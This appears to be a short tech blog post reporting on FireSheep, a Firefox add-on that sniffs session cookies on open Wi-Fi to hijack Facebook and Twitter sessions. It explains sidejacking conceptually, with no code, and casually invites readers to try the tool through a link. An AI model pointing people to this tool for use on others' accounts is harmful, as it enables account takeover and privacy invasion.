firesheep FireSheep Steals Session Cookies On Sites Like Twitter And Facebook

Recent news of a Firefox web browser add-on has sparked a lot of interest. Well, that’s only because the add-on allows you to “steal” session cookies on an unsecured network, and lets you gain access to other people’s Facebook or Twitter accounts easily. Talk about hacking made easy.

firesheep FireSheep Steals Session Cookies On Sites Like Twitter And Facebook

First, there’s Firefox, and now there’s FireSheep. In case you are wondering, FireSheep isn’t a web browser, but it is an add-on to the popular Firefox web browser though. (Its just weird that the name of the add-on is just a different animal, whatever that means). So what’s so special about FireSheep? The add-on lets almost anybody to scan a Wi-Fi network and hijack people’s access to web services like Facebook and Twitter. In short, a hack tool.

Coded by Eric Butler, a Seattle-based freelance Web application developer, FireSheep was designed to show the danger of accessing unencrypted Web sites from public Wi-Fi spots.

It’s extremely common for websites to protect your password by encrypting the initial login, but surprisingly uncommon for websites to encrypt everything else. This leaves the cookie (and the user) vulnerable. HTTP session hijacking (sometimes called “sidejacking”) is when an attacker gets a hold of a user’s cookie, allowing them to do anything the user can do on a particular website. On an open wireless network, cookies are basically shouted through the air, making these attacks extremely easy.

You can try out free, open source FireSheep at http://codebutler.github.com/firesheep , and the add-on is currently available on MacOS X and Windows platform. The Linux version is on the way.

Source: codebutler